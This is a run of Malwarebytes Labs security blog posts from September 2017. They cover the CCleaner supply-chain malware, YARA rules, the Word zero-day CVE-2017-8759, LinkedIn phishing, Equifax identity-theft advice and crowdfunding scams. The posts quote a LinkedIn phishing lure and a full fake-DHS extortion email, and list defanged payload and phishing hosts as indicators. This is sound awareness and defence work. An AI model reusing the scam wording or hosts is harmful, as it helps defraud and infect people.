Malware Bytes

A week in security (September 11 – September 17)

Malware Bytes Security - Mon, 09/18/2017 - 6:10pm

Last week, we dug into phishing campaigns done via Linkedin accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.


Consumer News

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Infected CCleaner downloads from official servers

Malware Bytes Security - Mon, 09/18/2017 - 11:31am

In a supply chain attack that may be unprecedented in the number of downloads, servers hosting CCleaner, a popular tool for cleaning up the PC, has been delivering a version of the said software with malware.

What happened?

Threat actors have managed to change the files that were being delivered by Avast servers hosting CCleaner updates. In case you are wondering why they were on those servers, Avast acquired Piriform, the original publishers of CCleaner, a few months ago.

The incident was discovered and reported by Talos. Piriform is aware of the situation and is acting to prevent further damage. They are also investigating how the files coming from their servers were modified before being released to the public.

Possible impact

It is difficult to say at this moment how many users might have been affected, but the numbers could be huge. From the statistics brought out by Piriform, CCleaner has been downloaded 2 billion times in total, 5 million times every week. The modified version, 5.33, is made available from August 15 until September 12 when version 5.34 was released.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information that is relevant for the malware like admin privileges, whether it is a 64-bit system, etc.

The malware uses a hardcoded C2 server and a domain generating algorithm (DGA) as a backup, to send information about the affected system and fetch the final payload.

What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you suspect you may have downloaded CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.

CCleaner users that are running older versions or that do not trust the one they are using now are encouraged to update their CCleaner software to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!


Pieter Arntz

The post Infected CCleaner downloads from official servers appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Explained: YARA rules

Malware Bytes Security - Fri, 09/15/2017 - 11:00am

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virustotal and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.


Each rule has to start with the word rule, followed by the name or identifier. The identifier can contain any alphanumeric character and the underscore character, but the first character is not allowed to be a digit. There is a list of YARA keywords that are not allowed to be used as an identifier because they have a predefined meaning.


Rules are composed of several sections. The condition section is the only one that is required. This section specifies when the rule result is true for the object (file) that is under investigation. It contains a Boolean expression that determines the result. Conditions are by design Boolean expressions and can contain all the usual logical and relational operators. You can also include another rule as part of your conditions.


To give the condition section a meaning you will also need a strings section. The strings sections is where you can define the strings that will be looked for in the file. Let’s look at an easy example.

rule vendor
$text_string1 = “Vendor name” wide
$text_string2 = “Alias name” wide
$text_string1 or $wide_string2

The rule shown above is named vendor and looks for the strings “Vendor name” and “Alias name”. If either of those strings is found, then the result of the rule is true.

There are several types of strings you can look for:

  • Hexadecimal, in combination with wild-cards, jumps, and alternatives.
  • Text strings, with modifiers: nocase, fullword, wide, and ascii.
  • Regular expressions, with the same modifiers as text strings.

There are many more advanced conditions you can use, but they are outside the scope of this post. If you would like to know more you can find it in the YARA documentation.


Metadata can be added to help identify the files that were picked up by a certain rule. The metadata identifiers are always followed by an equal sign and the set value. The assigned values can be strings, integers, or a Boolean value. Note that identifier/value pairs defined in the metadata section can’t be used in the condition section, their only purpose is to store additional information about the rule.


YARA is a tool that can be used to identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.


Signature-Based Detection With YARA

Latest YARA documentation

YARA: Simple and Effective Way of Dissecting Malware

Screenshots were made using Yara Editor by Adlice Software

Pieter Arntz

The post Explained: YARA rules appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Crowdsourced fraud and kickstarted scams

Malware Bytes Security - Thu, 09/14/2017 - 12:00pm

Crowdsourced funding opportunities via Kickstarter, Patreon, and GoFundMe have removed many structural roadblocks for people to access capital quickly and conveniently. But they’ve also lowered the barrier to entry for many very old scams. So how do you tell the difference between a great cause or project to contribute to and a digital confidence scam? What’s outright fraudulent, and what’s just a company with poor organizational skills? Let us take a look at pitfalls on two crowdfunding platforms.

GoFundMe primarily serves personal projects and donation pages, or other campaigns that otherwise don’t fit the more common commercial model found on Kickstarter. Funding requests cover a wide range of needs, from community sports groups to disaster relief, to education and medical care (for US users). It sounds like a great use of crowdfunding, but when it comes to fraud, things start to get a little iffy. Here’s what GoFundMe’s terms of service (ToS) have to say about its giving campaigns.

GoFundMe has no control over the conduct of, or any information provided by, a Campaign Organizer or a Charity, and GoFundMe hereby disclaims all liability in this regard to the fullest extent permitted by applicable law.

So as far as they’re concerned, buyer beware. But as a platform, they do have some minimal obligations, as well as some additional rules to not run afoul of some onerous regulations. To summarize their ToS, here’s what you can’t raise money for:

  • Drugs
  • Weapons
  • Any financial product
  • Gambling
  • Hate speech
  • Porn
  • Legal defense
  • Fraud

But wait a minute – how can fraud be on the list if they say they won’t vet campaigns? Because these categories largely are about liability and are included to absolve the platform of after-the-fact responsibility. The first four categories can place GoFundMe under regulatory scrutiny, however, and are most likely patrolled by counter-fraud algorithms. If you’d like to know what GoFundMe considers fraud, you can go to their page on the subject, which oddly does not say anything on the matter. They do have a fraud report form, but it requires proof of intentional deception on the part of the organizer. You can go to for examples of how difficult that is.


Kickstarter does a little bit better regarding fraud, requiring that the creators have an actual production plan and prototype to show backers, and prohibits an extensive list of backer rewards. Most important is the list of creator requirements, in particular:

You [must] have an address, bank account, and government-issued ID based in the country that you’re creating a project in.**

This single requirement raises the barrier to entry for most scammers and gives Kickstarter tools to track and permanently deal with scams that make it into the platform. Further, they claim to vet projects to make sure they meet with company guidelines before they go live. This is great for the vast majority of online scams that are blatantly fraudulent. Their track record on projects whose vetting require domain expertise is considerably worse.

SecuritySnakeOil.Org  is a site devoted to scammy information security projects on Kickstarter. Most of the projects on review combine open source hardware or software, expansive marketing claims, and entry level security flaws. From “unhackable” routers made from a Raspberry Pi running a years old build of Debian, to products that advertise “A custom operative system (OS) to avoid hacking”, what most of these share is an inability to vet them properly with a lack of domain expertise. That is, if you don’t know anything about the field, you would have difficulty evaluating their marketing claims, and the project creators don’t do a lot to help.

Even more legitimate projects, such as this Wi-Fi router with a built in VPN that blocks ads at the perimeter (Neat!), provides no details about any specific technology used in the product. So without adequate, accessible information on what you’re backing, how can you possibly make a safe choice?

What to do about it

Both GoFundMe and Kickstarter offer organizers the ability to link their Facebook account to their pitch. For GoFundMe, this allows you to see if the organizer is, in fact, someone connected to the cause and in a reasonable position to get the funds to the right place. For Kickstarter, Facebook can provide a name to look up an organizer’s employment history (or lack thereof.) But a better question to ask for a project involving an actual product would be this: Are the owner’s claims physically possible?

And lastly, the question that has protected people from fraud for time immemorial: Is this too good to be true?

The post Crowdsourced fraud and kickstarted scams appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Equifax aftermath: How to protect against identity theft

Malware Bytes Security - Thu, 09/14/2017 - 11:00am

Who here is scrambling around in the aftermath of the recent breach at Equifax to figure out if you’ve been compromised? Who here is wondering what to do about it if you are? If you’re one of the 143 million Americans whose data was accessed by cybercriminals, then you probably raised your hand.

Even if you weren’t one of the 143 million, you might still want to take some precautions. You could instead be part of the millions of folks who’ve had their data stolen over the course of online history. Basically, if you have a social security number, have ever run a credit check, or have a pulse, you should listen up. Why? Two words: identity theft.

What could happen?

The Equifax breach gave criminals access to vital personal information, including names, social security numbers, birthdates, addresses, and in some cases, driver’s license IDs and credit card numbers. And here’s just a slice of what those jerks can do with that data:

  • Open financial accounts
  • Apply for credit cards, mortgages, and other financial services
  • Get medical care at your expense
  • File for a tax refund in your name
  • Get a job in your name and let you pay the taxes
  • Steal your benefits
  • All of the above (aka, identity theft)
Who is impacted?

The better question might be, who isn’t? Don’t worry about verifying if your data was stolen—assume it was stolen. This is a decent rule of thumb even before the Equifax breach, but even if that thought never crossed your mind, it’s pretty impossible to verify whether you’ve been impacted at the moment.

The Equifax verification site is currently not returning accurate information. And if you try calling the company now, you might be met with some long waiting times to receive frustratingly vague answers. So if you want to act quickly (and we recommend you do), just bypass the first four stages of grief and go directly to acceptance.

What we do know: Those affected by the breach are predominantly from the US, but there are people from Canada and the UK impacted as well. Some methods that work in one country may not work in others, so please keep in mind that this article is aimed at our US readers. International readers can find some additional information about what to do here.

Steps to protect yourself

Our recommendation is to freeze your credit immediately with all three of the major credit bureaus. By freezing your credit, you’ll prevent criminals from trying to open up new accounts in your name—all of your current credit cards will still work. You’ll only need to consider unfreezing your credit if you want to apply for a loan, open a new credit card, or make any type of purchase that requires a check on your credit.

Two things you’ll want to know before contacting the credit bureaus.

One: the cost is minimal. While reports have varied—Equifax is offering their credit freeze for free, but it’s pretty hard to get through to them—freezing credit usually only costs a one-time fee of $10 per bureau. That’s 20 or 30 bucks for a whole lot of peace of mind.

Two: You must set or receive PINs when freezing your credit. Save these in a secure location, whether that’s using a password manager or physically storing the printed PIN paper someplace safe and out of sight.

Where to go to freeze your credit

In addition, you should get your credit report, free and without upsells, here.

Our recommendation is to pull only one report now, another one in four months, and the third in another four months. It’s not foolproof, but it will allow you to see different reports throughout the year to track any potential changes.

Additional monitoring services

The use of additional monitoring services is entirely up to you. The biggest issue is that both legitimate companies trying to help and scammer companies trying to trick will over-hype the danger of identity theft in order to make a sale. Please make sure that you do your homework and research on these companies before signing up blindly out of fear.

When looking up information about how to protect yourself in situations like these, look to sites like the Federal Trade Commission or other technology publications such as Wired, The Verge, or Vice’s Motherboard, as they won’t be trying to upsell you to credit protection you may or may not need. The wrong company might actually hurt your ability to stave off ID theft.

General best practices

We wish we could say that the above advice is going to save you from all the dangers associated with this breach. For credit theft, you are covered, but for all the other threats associated with scammers or fraudsters looking to capitalize on this situation, here are some additional guides on how to avoid their traps.


Be on the alert for credit scams or any related terms. You’ll see these in emails, ads on social sites or games, and even physical mail to your home. These attacks are part of what we refer to as social engineering, and they will run rampant for many months and years to come. Always be skeptical, and if you’re not sure about something, ask a professional.

Phone or text scams

Since your data was most likely taken, that means your numbers will be shared even more than they already are today. Calls and texts from unknown numbers, numbers with similar area codes, or numbers very similar to yours should be treated as potential scams.

You might think that the National Do Not Call Registry would protect you from this. Sadly, it does not. It offers protection from legit companies trying to solicit your business. It does not offer protection against scammers. (Because why would criminals follow the law, anyway?)

my Social Security account

The my Social Security account allows you to keep track of the social security funds you’ll be collecting in the future. Although it was not affected by the Equifax breach, it’s good practice to get this account set up in your name, as someone else could easily grab it and you’d be locked out of your future payments. Literally make an account (using the password guidance below) and never use it again.

Passwords and two-factor authentication

Ensure you’re using smart password strategy (complex, do not repeat them, do not use the same one across multiple sites/services, etc.) and if available, enable two-factor authentication (2FA) on every account possible. You can check the 2FA availability on your sites and services here.

Enable alerts on your accounts

While your current accounts shouldn’t be impacted by this breach, it’s never a bad idea to keep an eye on your bank accounts and credit cards for larger purchases. For accounts rarely used, you could set alerts to $1 so you’re notified the second any transaction happens. For regular accounts, set the alerts to a dollar amount that would seem out of place for that card, whether it’s $20 or $500.

New phone accounts

A common attack vector with credit/personal data breaches is to purchase new phone accounts through your provider, with your account! Once criminals have your info, they’ll call up the phone company and say they want to add a new line but don’t have a PIN number. If you haven’t set up a PIN number with your phone company already, they have no way to verify your account. So guess what? BAM! There’s a new phone on your bill. In order to protect yourself from this type of attack, go ahead and set up a PIN with your provider.


File these as soon as possible next year! For multiple years we’ve heard about victims of tax return fraud, wherein a scammer using your personal information files YOUR return before you can. So don’t wait on this one.


If you’re affected by the Equifax breach, you have a heightened risk of becoming a victim of identity theft. But at this juncture, the point is moot. Since it’s difficult to discover a definitive answer, it’s best to assume you are and deal with the fallout.

We’ve given you some direction on what to do to avoid identity theft and credit fraud, and we hope you take a deep breath, crack your neck, and get to work nailing your personal info down. One new credit card created by an attacker in your name is going to cause a massive headache. Better to stay ahead of it than spend the next month trying to convince a bank that you didn’t open an account. Good luck, be vigilant and stay safe.


The Malwarebytes Labs team

The post Equifax aftermath: How to protect against identity theft appeared first on Malwarebytes Labs.

Categories: Malware Bytes

PSA: New Microsoft Word 0day used in the wild

Malware Bytes Security - Wed, 09/13/2017 - 6:49pm

Microsoft has just patched an important vulnerability in Microsoft Word during its latest patch Tuesday cycle. According to the security firm that found it [1], this new zero-day (CVE-2017-8759) was used in targeted attacks to install a piece of malware known as FinFisher.

Microsoft Office has been in the line of fire throughout the year with malware distributors employing various social engineering techniques to trick users into opening up booby-trapped documents laced with exploits or macros. Indeed, while exploit kit activity has plummeted, malicious spam has been the dominant threat.

In this blog post, we do a quick review of this latest exploit and how future attackers are likely to add it to their own campaigns.

Infection flow

CVE-2017-8759 leverages an improper validation in a parsing module of the Web Services Description Language (WSDL) which leads to arbitrary code injection and execution. As we have seen it many times in previous attacks, mshta.exe is used to retrieve a script and eventually the malware payload.

Figure 1: Traffic view showing script and payload retrieval

Figure 2: Process view showing infection technique

Payload delivery implications

Depending on how the malicious document is delivered, it can require little or no user interaction in order to infect the target. In the former case, the document could be downloaded from a website or come as spam. It would bear the Mark of the Web and be flagged. In the latter case where the document was packaged – for example using 7zip – it could lose that MotW [2].

Figure 3: Side-by-side comparison of the same file, distributed differently.

In the first case, the user will be prompted to enable Protected View mode (which admittedly is less suspicious than enabling macros). This, in turn, will trigger the malicious code to execute.

Figure 4: CVE-2017-8759 attempt blocked (Protected View mode)

In the second case, where the MotW has been lost, the malicious Word document will immediately run its payload:

Figure 5: CVE-2017-8759 attempt blocked (normal mode)

If you haven’t done it yet, we strongly advise you to run Windows updates and apply the latest security patches. If experience serves well, each time a new zero-day is exposed, other online criminals jump in and rush to add it to their arsenal. This means that what was a small and targeted attack can all of the sudden become a widespread campaign.

Malwarebytes users were already protected against this exploit when it was still a zero-day and we also detect and block the FinFisher malware payload.


[1] FireEye,

[2] Eric Lawrence,

Indicators of compromise

Malicious Word document:




Network traffic:

91.219.236[.]207/img/office.png 91.219.236[.]207/img/word.db 91.219.236[.]207/img/left.jpg

The post PSA: New Microsoft Word 0day used in the wild appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Multiple flaws found in smart syringe pump

Malware Bytes Security - Wed, 09/13/2017 - 12:27pm

A syringe pump is a small infusion pump that delivers liquids, either medication or nutrients, in small quantities into the patient’s system. Hospitals, nursing homes, and homes with residents under acute or palliative care use them. Accurate and safe delivery of dosage from a variety of syringes make such a device essential. Unfortunately, a particular model of a wireless smart pump is found to be so vulnerable that a malicious, highly skilled attacker can compromise its communications and therapeutic modules, which in turn could also compromise a patient’s well-being.

Late last week, the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released an advisory for the Medfusion 4000 Wireless Syringe Infusion Pump after Scott Gayou, an independent security researcher, brought to light multiple vulnerabilities in the device that can be exploited remotely.

According to Gayou, the said syringe pump has problems with the way it processes data, which could then lead to either the unauthorized execution of code or a system crash. He also pointed out that several credentials are hard-coded to the pump, with some even accessible to anyone if the pump’s communication module is modified. Furthermore, the pump is incapable of validating certificates, making it a good candidate for MiTM attacks, allowing threat actors to bypass any security measures in place and gain elevated privileges on it.

Medfusion 4000 Wireless Syringe Infusion Pump versions 1.1, 1.5, and 1.6 are affected by these vulnerabilities.

Smiths Medical, makers of the said smart pump, has announced that they’ll be releasing version 1.6.1 of the product to address the vulnerabilities above. In the meantime, ICS-CERT has advised users of the Medfusion 4000 syringe pump to take steps to lessen the possibility of exploitation. One advice is to disconnect the pump from the internet altogether.

Smiths Medical and ICS-CERT provided more mitigation steps in this advisory.


The Malwarebytes Labs Team

The post Multiple flaws found in smart syringe pump appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Remediation vs. prevention: How to place your bets

Malware Bytes Security - Wed, 09/13/2017 - 11:00am

Building a security environment for businesses these days is a gamble: layer on too much and your programs may be canceling each other out or causing redundancy (and your leaders may be wondering why you’re spending so much). Invest too little and get breached: it’s snake eyes for you. Whether you choose remediation, proactive prevention, or both, finding the right balance is the key to a winning hand.

What is remediation?

Remediation is the process of correcting system changes, for example, removing threats off of an infected system. These threats bypassed existing security measures and likely already caused damage. The goal is to remediate threats before they cause any further damage.

In most cases, threats have made themselves known in some malicious fashion, making the need to remove them urgent. But the remediation process can potentially last anywhere from hours to days depending on the tools at hand and the resources dedicated to the process.

What is proactive prevention?

Proactive prevention is the ability to block the latest threats before they reach a system or network and cause damage. This form of protection requires technologies that detect and block unknown threats.

This is the most effective security approach in dealing with ransomware attacks. Once ransomware gets onto a system and encrypts the victim’s data, a ransom demand is presented to the victim requiring swift payment in digital currency in order to receive the files back via a decryption key. However, paying the ransom does not guarantee you’ll get your data back.

In rare cases, decryption programs or algorithms (decryptors) are available thanks to the valiant efforts of security researchers. Unfortunately, this reactive approach offers too small of a ray of hope in comparison to the sheer number of ransomware variants that continue to hit the streets every week.

Why are businesses sticking with remediation? Cost

Remediation tools, by nature, are less expensive than full protection. In addition, some businesses are adding remediation tools to run alongside their existing security measures. Due to budget constraints, many IT/Network Administrators wait before deciding on a full protection product.

For instance, a company of any size may be running an existing tool, like antivirus, with a three-year subscription. It may be easier for the company to let the contract run out before purchasing a new, more inclusive product. In this type of situation, adding a remediation tool to the existing security stack provides an additional, incremental value to security capabilities.

SMBs playing the odds

Many businesses assess their potential risk and exposure to attack, and many businesses, especially smaller ones, tend to believe there is less chance of an attack happening to them. In a survey conducted by CNBC and SurveyMonkey on over 2,000 small businesses, only 2 percent of small business owners said they viewed a cyberattack as the most critical issue they face. However, in the last year, malware detections increased more than 165 percent among SMBs.

With limited resources or a short-handed IT staff, small to mid-size businesses also face especially tight budgets on top of risk evaluation, so they need to allocate their spending accordingly. This is what they’ve always done, and they are not alone. Dell recently released a study that stated 53 percent of IT decision makers say cost is one of the biggest constraints to taking additional security measures.

Many believe it is easier to remediate a few errant incidents than to find several security solutions to combat various strains of malware. However, security incidents are increasing in frequency not only with enterprise-level businesses but also among small to mid-size businesses. In Malwarebytes’ recent report of Analysis of Malware Trends for Small to Medium Businesses Q1 2017, it was discovered that ransomware incidents alone rose 231% within the last year among SMBs.

Worst-case scenario

Ransomware is cause for concern for those using remediation-only methods because its damage cannot be undone unless rare decryptors are available. Businesses on a tight budget could compare the cost of proactive prevention tools to the potential ransom demands from a ransomware attack and the projected downtime in productivity. But even that estimation is tricky because there’s no guarantee cybercriminals will provide you with a key, process the transaction, or deliver clean code.

However, it is important to note that even if files are restored, the system or network can still be vulnerable because ransomware can leave behind remnants or the attacker may have planted more malicious code to utilize at a later date on the system. Other options include full wiping and rebuilding of machines and restoring from back up if the files are stored somewhere else, but that takes a lot of time, especially if multiple endpoints were impacted.

If a cyberattack were to hit an unprepared business, it can be a devastating event, causing a loss in productivity, loss of revenue, and even cause damage to the company’s reputation. For malware attacks other than ransomware, remediation tools are useful to run a full scan cleaning damage after the infection. But the truth is this: The remediation-only approach will simply not protect against a major ransomware attack.

How businesses benefit from proactive prevention

Threats are continuing to evolve and traditional security solutions are almost rendered obsolete. In order to effectively block these threats, security has to evolve as well. Here’s how the proactive approach benefits businesses:

1. It avoids risk and damage to endpoints.

With a proactive prevention tool, businesses see the value from the reduction in threat exposure. The less threat exposure, the less risk to the business.

2. It reduces/eliminates manual threat removal.

Forty-five percent of SANS survey respondents say that their prevention, detection, response and remediation processes are still mostly or completely manual. With a proactive prevention security tool, businesses eliminate the need for any manual threat removal because threats are caught earlier on and there are not as many remediation demands.

3. It reduces downtime.

It was discovered in the Osterman report that more than 60 percent of attacks take organizations more than nine hours to remediate. This is because of the need to manually remove threats as well as re-image machines where necessary. Without the manual process, time to remediate, or downtime, is significantly reduced.

4. It enables expert staff to focus on critical issues.

Remediation or reactive methods often require valuable resources and create a crisis due to the complexity of each threat. The administrator who removes the threats needs to have a certain level of expertise—often requiring skills that only few have. In Frost & Sullivan’s 2015 Global Information Workforce Study, researchers predict that there will be a shortage of 1.5 million information security experts by 2020, so the pool of talent is only getting smaller.

The shortage of capable admins causes additional issues to threat removal because it isn’t always as easy as clicking one button to disinfection the entire network; it can take hours to days away from productivity. Time can be spent on more valuable projects when admins are given the ability to run periodic scans to proactively check for anomalies.

Why do I have to choose?

You don’t have to choose. Remediation alone might not muster against large-scale attacks, but it can provide great assistance if threats slip through the cracks. If you’re looking to add a layer of security to your existing tool belt, we recommend a strong remediation tool for post-incident cleanup and some peace of mind. On the other hand, proactive prevention stops an attack before an infection occurs, avoiding risk and reducing damage.

Remediation tools, like Malwarebytes Incident Response, can be deployed on top of existing traditional approaches to provide peace of mind for those “what if” instances if your existing security measures fail. Finding a product that delivers both, like Malwarebytes Endpoint Protection, ensures multiple attack vectors are covered from the start.

The post Remediation vs. prevention: How to place your bets appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Compromised LinkedIn accounts used to send phishing links via private message and InMail

Malware Bytes Security - Tue, 09/12/2017 - 1:24pm

Phishing continues to be a criminals’ favorite for harvesting user credentials with more or less sophisticated social engineering tricks. In this post, we take a look at a recent attack that uses existing LinkedIn user accounts to send phishing links to their contacts via private message but also to external members via email.

What makes this campaign interesting is the abuse of long standing and trusted accounts that were hacked, including Premium membership accounts that have the ability to contact other LinkedIn users (even if they aren’t a direct contact) via the InMail feature. The fraudulent message includes a reference to a shared document and a link that redirects to a phishing site for Gmail and other email providers which require potential victims to log in.

Those who proceed will have their username, password, and phone number stolen but won’t realize they were duped right away. Indeed, this phishing scam ends on a tricky note with a decoy document on wealth management from Wells Fargo.

Private message

This message was received from a trusted and existing contact, although the time stamp is showing 12:17 AM, which is perhaps one of the red flags to be noted. The message talks about a shared Google Doc and gives a link to it, via the URL shortener.

Figure 1: An instant message from a contact directing to a phishing scam

Behind the shortened URL redirection

URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both and a free hosting provider ( to redirect to the phishing page, itself hosted on a hacked website.

Figure 2: The redirection flow behind this phish

Phishing for email credentials

This particular page is built as a Gmail phish, but will also ask for Yahoo or AOL user names and passwords. The main page is followed by an additional request for a phone number or secondary email address and ultimately the user sees a decoy Wells Fargo document hosted on Google Docs.

Figure 3: The phishing template, harvesting credentials and showing decoy content


Attackers are also abusing LinkedIn’s trusted InMail feature to send the same phishing link. As per LinkedIn, “InMail messages are sent directly to another LinkedIn member you’re not connected to.” This is an interesting aspect since it opens up the scope of the attack not only to the compromised account’s own contacts but also to other users.

This email was sent via LinkedIn and had a custom ‘Security Footer‘. LinkedIn will send messages “that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from “phishing” email messages“, although it does point it out that it is no guarantee that the email is legitimate. In other words, the delivery method is to be trusted, but the content may not. The same can be said for phishing pages that use HTTPS – which is the case here – making content delivery secure but the content itself fraudulent.

Figure 4: The phishing email received via LinkedIn that includes the ‘Security Footer’

However, there’s a caveat here. To use InMail, you need a Premium account which comes at a hefty monthly cost. There’s a good article by KnowBe4 detailing a phishing attack using LinkedIn’s own platform via InMail. The researchers showed how trivial it is to create a free account, start connecting with people, and finally upgrade to a Premium account in order to start sending scams via InMail. But the conclusion of their research is that this particular attack would not scale well due to limited InMail credits, making the operation way too expensive.

This limitation does not apply here though since the crooks are not creating (and paying for) their own accounts, but rather leveraging existing ones. Therefore, they have little to worry about burning free credits and tarnishing their victim’s reputation so long as it allows them to deliver their payload far and wide.

Personal security and its implications

We do not know how (malware, other phishing attacks, etc.) or how many LinkedIn accounts were compromised in this campaign. It’s also unclear whether the shortened URLs are unique per hacked account or not, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and based on Hootsuite‘s stats, we know 256 people clicked on the phishing link.

Figure 5: A Premium member account with 500+ connections caught sending phishing link

This kind of attack via social media is not new – we have seen hacked Skype or Facebook accounts send spam – but it reminds us of how much more difficult it is to block malicious activity when it comes from long standing and trusted user accounts, not to mention work acquaintances or relatives. This also makes such attacks more credible to potential victims and can lead to a snowball effect when victims become purveyors of phishing links themselves.

If your LinkedIn account gets compromised, you should immediately review its settings to change your password and enable two-step verification (instructions here). Additionally, you can post a quick update on your timeline that lets your contacts know you were hacked and that any previous message you may have sent with links should be carefully vetted.

We’d like to thank @acfou for sharing a sample of this campaign with us.

Indicators of compromise

Phishing message:

I have just shared a document with you using GoogleDoc Drive, View shared document[]

Redirection and phishing page:

ow[.]ly/qmxf30eWLyN dgocs[.] dgocs[.] cakrabuanacsbali[.]com/wp-rxz/index.php

Decoy Google Docs Wells Fargo file:

The post Compromised LinkedIn accounts used to send phishing links via private message and InMail appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (September 4 – September 10)

Malware Bytes Security - Mon, 09/11/2017 - 3:53pm

Last week, we looked into expired domain names being used for malvertising, delved into dubious Facebook apps, and checked out Chinese seminar scams. We also explained the whys and wherefores of false positives, explained what Google is doing with HTTPs, warned you away from a fake DHS email, and outlined some early information about the Equifax breach.


Consumer News Business News

Stay safe!

Malwarebytes Lab Team



The post A week in security (September 4 – September 10) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Fake DHS email – “Give us $350 in the next 24 hours”

Malware Bytes Security - Fri, 09/08/2017 - 11:00am

Who likes threats?

Nobody, as it turns out. That hasn’t stopped scammers from jumping on the menacing email train – next stop, your inbox.

Every now and then, we see the 419 “Hitman deployed to kill you” missive doing the rounds. On a similar threatening note, we have a fake DHS notification telling you to pay a $350 fee within 24 hours – or else.

The email reads as follows (we’ve put the meatiest threats in bolded text):


You are to contact the U.S. Department of Homeland Security (DHS) Washington, D.C to obtain your Clearance Certificate, find below their contact information:

Contact Person: Stevan Bunnell
General Counsel
U.S. Department of Homeland Security (DHS)
Washington DC Mailing Address U.S. Department of Homeland Security Washington, D.C. 20528.

Ensure you contact (DHS) with your Full Name, Address and phone number/cell number.
Contact the DHS via Email with the information above immediately, once you contact them I will get back to you or else I will have an agent come visit you at home for questioning.

Furthermore, be advised that according to the United State Law together with the Federal Bureau of Investigation rules and regulations, you are to obtain the document from the DHS. Also note that you are to take care of the cost of the Clearance Certificate, which will be issued in your name. Due to the content of the Clearance Certificate and how important and secured the document is, you as the beneficiary will send the DHS the sum of $350 Dollars only for the issuing of the Clearance Certificate. That is the lay down rules for the DHS to release such sensitive document; DHS will issue you the authentic and original copy of the Clearance Certificate with a seal on it for verification and approval.

You are hereby advised to Contact them through the email address above to make an inquiry concerning how you will send the official fee to them. Note that you are to observe this immediately, if you really want your funds to be credited to your personal bank account and to avoid any legal battle with the security operatives over this matter. We have already informed the DHS about the present situation go ahead and contact them immediately.
Your funds are under our custody and will not be released to you unless the required document is confirmed, after that the fund will be release to you immediately without any delay.

NOTE: We have asked for the above document to make available the most completed and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.

WARNING: Failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed as terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. Nobody is above the law and the law is not a respecter of anybody. We presume you are law abiding and would not want to have scuffles with the authority, in and outside of the United States.

We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don’t dare dispute our instruction, just act as instructed. The person you know will not help you in this matter rather abide by this instruction.

Note: You are to contact DHS with your full names, phone number/cell number and full address via the email which I stated above immediately, for the processing of your Clearance Certificate within the next 48 hours.

Faithfully Yours
Thomas Dinapoli
Office of the New York State Comptroller

That’s quite the barrage of “pay up”, and could well scare some people into handing over whatever the scammers ask for (and we’d be surprised if they stop at the $350). Should you receive one of these emails, simply delete it and go on with your day – nobody is coming to collect money from you.


Christopher Boyd


The post Fake DHS email – “Give us $350 in the next 24 hours” appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Equifax breach: What you need to know

Malware Bytes Security - Fri, 09/08/2017 - 3:02am

On July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax’s overall security posture.

According to Equifax, online criminals maintained their presence from mid-May through July 2017 and had access to:

  • Names
  • Social Security numbers
  • Birth dates
  • Addresses
  • Driver’s license numbers (in some cases)
  • Credit card numbers (for approx. 209,000 U.S. consumers)

It also said that some personal information for certain UK and Canadian residents was part of this breach.

This is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.

Equifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to, a website Equifax has just set up.

The post Equifax breach: What you need to know appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Google reminds website owners to move to HTTPS before October deadline

Malware Bytes Security - Thu, 09/07/2017 - 11:36am

With the release of Chrome v62 in less than 3 months, Google will begin marking non-HTTPS pages with text input fields—like contact forms and search bars—and all HTTP websites viewed in Incognito mode as “NOT SECURE” in the address bar. The company has started sending out warning emails to web owners in August as a follow-up to an announcement by Emily Schechter, Product Manager of Chrome Security Team, back in April.

Google began marking sites in Chrome v56, which was issued in January of this year. They targeted HTTP sites that collect user passwords and credit card details.

For owners to secure the information being shared among their visitors and their web server, they must start incorporating an SSL certificate. Failing to do this is risky for both parties: sites that allow the sending of information in clear text may also allow its exposure through the Internet.

Ms. Schechter also provided website owners with a handy guide on how to enable HTTPS on their servers. An additional guideline on how to avoid the “NOT SECURE” warning on Chrome is also available for web developers.

